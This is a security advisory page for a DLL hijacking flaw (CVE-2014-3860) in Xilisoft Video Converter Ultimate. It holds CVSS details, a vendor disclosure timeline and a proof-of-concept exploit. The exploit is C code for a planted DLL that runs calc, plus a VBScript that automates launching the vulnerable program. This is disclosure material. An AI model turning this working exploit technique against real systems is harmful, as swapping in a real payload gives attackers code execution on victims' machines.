Xilisoft Video Converter Ultimate 7.8.1 build-20140505 DLL Hijacking

2014.06.03
Risk: Medium
Local: Yes
Remote: No
CWE: CWE-426


CVSS Base Score: 4.4/10
Impact Subscore: 6.4/10
Exploitability Subscore: 3.4/10
Exploit range: Local
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

/* * Title: Xilisoft Video Converter Ultimate Dll Hijacking Exploit (quserex.dll) * Version: 7.8.1 build-20140505 (Previous versions might be vulnerable) * Tested on: Windows XP SP2 en * Vendor: http://www.xilisoft.com/ * Software Link: http://www.xilisoft.com/webapp/downloader.php?product_code=x-video-converter-ultimate7 * Exploit-Author: Osanda Malith Jayathissa * /!\ Author is not responsible for any damage you cause * Use this material for educational purposes only * Twitter: @OsandaMalith * CVE: CVE-2014-3860 */ /* Vulnerable Executables: 1. vcloader.exe 2. vc.exe 3. vc_buy.exe */ #include <windows.h> int pwned() { WinExec("calc", 0); exit(0); return 0; } BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved) { pwned(); return 0; } /* As this application as no extensions associated we have to manually a open a file with this application. So we can automate this process by writting something like this ;) Place the DLL and this script in the same location. Once the victim runs this script the DLL will be hijacked. msg=MsgBox ("Automated POC" & chr(13) & "Coded by Osanda Malith", 64, "Xilisoft Video Converter Ultimate Dll Hijacking Exploit") Set objFileToWrite = CreateObject("Scripting.FileSystemObject").OpenTextFile("new.jpg",2,true) objFileToWrite.WriteLine("POC by Osanda Malith :D") objFileToWrite.Close file = "new.jpg" Set oShell = CreateObject("WScript.Shell") ' Path to Xilisoft Video Converter oShell.Run """%ProgramFiles%\Xilisoft\Video Converter Ultimate\vcloader.exe """ & file */ /* Disclosure Timeline 2014-04-20 : Contacted the vendor 2014-04-23 : Contacted again as I did not recieve any reply 2014-04-24 : Recieved a response saying that it was forwarded to technicians 2014-05-16 : Contacted again since there is was reply 2014-05-20 : Recieved a response saying that they cannot reproduce 2014-06-01 : Contacted MITRE 2014-06-02 : Public disclosure */ //EOF


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top